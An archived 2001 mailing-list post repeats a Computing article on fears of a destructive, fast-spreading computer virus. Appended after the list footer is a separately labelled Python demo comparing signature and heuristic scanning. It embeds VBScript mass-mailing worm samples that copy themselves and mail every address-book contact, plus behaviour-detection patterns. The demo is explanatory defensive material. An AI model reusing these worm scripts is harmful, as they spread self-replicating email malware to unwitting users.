Return-Path: <sentto-279987-3479-1004119293-fc=all.net@returns.onelist.com>
Message-Id: <200110261801.f9QI1e401961@red.all.net>
From: Fred Cohen <fc@all.net>
Organization: I'm not allowed to say
To: iwar@onelist.com (Information Warfare Mailing List)
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Reply-To: iwar@yahoogroups.com
Date: Fri, 26 Oct 2001 11:01:40 -0700 (PDT)
Subject: [iwar] [fc:Beware.the.supervirus]

Beware the supervirus
Computing, 11-10-2001
http://www.vnunet.com/Features/1126331

Hoax virus warnings are as central to online culture as broken links and bust dotcoms.
If you receive an email with the subject header XXX Teletubbies! delete it immediately. It will trash your hard drive and kidnap your goldfish. The fact that such warnings have achieved parody status shows just how far the virus has pervaded Net consciousness. But the proliferation of dire warnings, whether in jest or not, masks a very real fear: the possible emergence of a computer supervirus.

The idea that a supervirus could knock out a large proportion of the world's computers in a matter of hours is understandably met with doubt by many. But there are signs that our scepticism is bordering on complacency. Some viruses in the wild have serious payloads indeed. In 1998, the Windows virus CIH (also known as Chernobyl) was the first to overwrite not only a user's data but also the computer's flash BIOS, rendering machines unbootable without major surgery. At the end of 1999, the Kriz virus used a similar technique and also attempted to overwrite all the files on the hard drive, replacing them with nonsense. In March of this year, another BIOS-blasting virus, Magistr, was detected; this time it could also propagate itself as an email worm with random subject lines, body text and attachment names.

Fortunately, these and other outbreaks were caught at an early stage by antivirus companies, which were able to issue signature updates to their customers. And most of these viruses did not have particularly good means of propagation in the first place, as they required users to open an attachment.

Speed freaks

Melissa, I Love You and Kournikova were all notable for the speed with which they spread across the globe's networks. In each case, antivirus scanners and other security packages were quickly updated to catch future iterations, but to be effective a signature-based antivirus scanner needs to know the signature of a virus, which means the vendor must already have captured and analysed that virus.
While it is true that some antivirus technology, using heuristic scanners, looks for virus-like behaviour rather than signatures, such products are in their infancy. Many security consultants and analysts believe that it is only a matter of time before the rapid propagation of Melissa-type viruses and the destructive payload of Kriz combine in a single, corporate-crippling supervirus.

"We've seen destructive payloads, and we've seen wildly propagating viruses. At some point in the future, we will see a virus that has a combination of both," says Rob Boltman, principal consultant for security at IT consulting firm Detica. "I don't think it's inevitable, but there's certainly a high probability that it will happen," adds Andy Kellet, senior research analyst with the Butler Group.

Such fears are compounded by the ever-increasing complexity of corporate IT infrastructures, none of which can be 100 per cent free of vulnerabilities. And the growing availability of point-and-click software that allows even novice hackers to create Trojan horses and other complex viruses represents an increasing threat. "They're becoming rather like Airfix play kits," says Kellet.

High risk of havoc

The reliance on a few main applications and operating systems means that the risk of a supervirus creating havoc is increased, says Neil Barrett, technical director at risk management consultancy IRM and an expert advisor to the National High-Tech Crime Unit. It wouldn't be "beyond the wit of man" to write a smart virus that spreads through Microsoft Exchange and Lotus Notes and relies on the main features of Office 2000 to deliver its damage, he says. "The only machines that are going to be safe are Linux and Apple, meaning that 80 per cent of systems are going to be vulnerable," he says. "Something subtly imaginative and powerful is going to get out there much faster than the anti-virus products can sweep it."

However, Barrett sees some grounds for optimism.
A virus writer almost always tests the ability of his creation to spread in the real world before equipping it with the dangerous payload. This gives antivirus companies a valuable warning of new strains and a chance to develop strategies to combat them, he says. In addition, virus writers are as fallible as any other programmer. "I can't think of any software that's bug free, and this software is no different," says Barrett. "I'm not going to say it will never happen, in the same way that nobody would say that the Ebola virus will never become airborne. The same sort of thing could happen on the internet with viruses, but it hasn't happened yet."

Stop, there's an intruder about

While a supervirus isn't out of the question, corporate IT departments should be more worried about other system intrusions that compromise security and provide a way in for viruses, say analysts. "We frequently trip across some form of monitoring device that's been deposited on a client's system and has spread throughout the network, giving hackers a back door into the system or emailing out confidential information," says Matt Tomlinson, business development director at security consultancy MIS. "Such viruses and Trojans are available on the web and many cannot be detected by anti-virus software."

Education and insurance

Not surprisingly, security consultants and analysts believe more investment in security is the answer. But with budget restrictions and boardroom scepticism over the precise level of risk posed by viruses, investment in security isn't always a top priority. In that case, there are other, cheaper ways to minimise security risks, says Stuart Houghton, network administrator at Amnesty International. "There's always some new viral threat that your antivirus software might not grab. The best way to combat it is to educate users and try to stop them doing the stupid things that would make a virus a threat in the first place," he says.
But for those who still can't sleep at night, Tomlinson suggests a more traditional solution that doesn't involve extensive, and expensive, security audits: insurance. "Given that no system can ever be 100 per cent secure, and insurance is all about pooling risk, I think that's the direction we'll see the market going," he says.

------------------
http://all.net/
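The article's central technical point is that a signature scanner can only catch a virus whose bytes a vendor has already captured and analysed, whereas a heuristic scanner looks for virus-like behaviour and so can flag a variant it has never seen. The following is an added example illustrating that contrast; it is not code from the article, from Computing, or from the mailing-list post. The VBScript-style samples, the signature database, the DEMO.Worm.A name, the behaviour regexes and the flagging threshold are all constructed for illustration and are assumptions, not real malware or real vendor signatures. The "variant" sample reproduces the Magistr-style trick the article mentions: same mail-worm behaviour, but with randomised identifiers, attachment names and subject lines so that no fixed byte pattern survives.

```python
"""Signature scanning versus behavioural heuristics on constructed samples.

Added example, not the article's own code. Everything below (samples,
signature database, behaviour patterns, threshold) is constructed for
illustration; no real malware or real vendor signatures are involved.
"""
import re

# Constructed signature database: a vendor "signature" is a byte string cut
# from a sample that has already been analysed. Purely illustrative.
SIGNATURES = {
    "DEMO.Worm.A": b'CopyFile WScript.ScriptFullName, "C:\\KNOWNWORM.vbs"',
}

# Behavioural indicators of the mail-worm pattern the article describes:
# open Outlook, enumerate the address book, copy itself to disk, send mail
# with an attachment. The regexes are assumptions about what such scripts
# look like, not a real heuristic engine.
BEHAVIOURS = {
    "creates_outlook_session": re.compile(r'CreateObject\("Outlook\.Application"\)', re.I),
    "enumerates_address_book": re.compile(r"\bAddressLists\b|\bAddressEntries\b", re.I),
    "copies_itself_to_disk": re.compile(r"CopyFile\s+WScript\.ScriptFullName", re.I),
    "sends_mail_with_attachment": re.compile(r"\.Attachments\.Add\b[\s\S]*?\.Send\b", re.I),
}
FLAG_THRESHOLD = 3  # assumed: three or more indicators is "virus-like"

# Constructed sample 1: the strain the vendor has already analysed.
KNOWN_SAMPLE = b'''
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile WScript.ScriptFullName, "C:\\KNOWNWORM.vbs"
Set ol = CreateObject("Outlook.Application")
Set mapi = ol.GetNameSpace("MAPI")
For Each entry In mapi.AddressLists(1).AddressEntries
    Set msg = ol.CreateItem(0)
    msg.To = entry.Address
    msg.Subject = "Important"
    msg.Attachments.Add "C:\\KNOWNWORM.vbs"
    msg.Send
Next
'''

# Constructed sample 2: same behaviour, but identifiers, attachment name and
# subject are randomised, so the fixed signature above no longer matches.
VARIANT_SAMPLE = b'''
Set qz = CreateObject("Scripting.FileSystemObject")
qz.CopyFile WScript.ScriptFullName, "C:\\" & Int(Rnd * 9999) & ".vbs"
Set a1 = CreateObject("Outlook.Application")
For Each e In a1.GetNameSpace("MAPI").AddressLists(1).AddressEntries
    Set m = a1.CreateItem(0)
    m.To = e.Address
    m.Subject = Mid("random words here", Int(Rnd * 10), 6)
    m.Attachments.Add qz.GetFile(WScript.ScriptFullName).Path
    m.Send
Next
'''

# Constructed sample 3: a legitimate admin script that reads the address book
# but neither copies itself nor sends mail; the heuristic must not flag it.
BENIGN_SAMPLE = b'''
Set ol = CreateObject("Outlook.Application")
For Each entry In ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries
    WScript.Echo entry.Name & "," & entry.Address
Next
'''


def signature_scan(sample: bytes) -> list[str]:
    """Return the names of every known signature found byte-for-byte."""
    return [name for name, pattern in SIGNATURES.items() if pattern in sample]


def heuristic_scan(sample: bytes) -> tuple[list[str], bool]:
    """Return the behaviours observed and whether they cross the threshold."""
    text = sample.decode("latin-1")
    hits = [name for name, rx in BEHAVIOURS.items() if rx.search(text)]
    return hits, len(hits) >= FLAG_THRESHOLD


def scan(sample: bytes) -> dict:
    """Combine both verdicts for one sample."""
    behaviours, suspicious = heuristic_scan(sample)
    return {
        "signature_matches": signature_scan(sample),
        "behaviours": behaviours,
        "heuristic_flag": suspicious,
    }


if __name__ == "__main__":
    for label, sample in (("known", KNOWN_SAMPLE),
                          ("variant", VARIANT_SAMPLE),
                          ("benign", BENIGN_SAMPLE)):
        print(label, scan(sample))
```

Running it shows the asymmetry the article describes: the known strain is caught by both scanners, the variant slips past the signature database entirely but trips all four behavioural indicators, and the benign address-book export triggers only two and is left alone. The real engineering problem, which the article's "in their infancy" remark hints at, is the threshold: set it too low and every mail-merge macro becomes a false positive, set it too high and a worm that drops one indicator walks through.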
This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:57 PST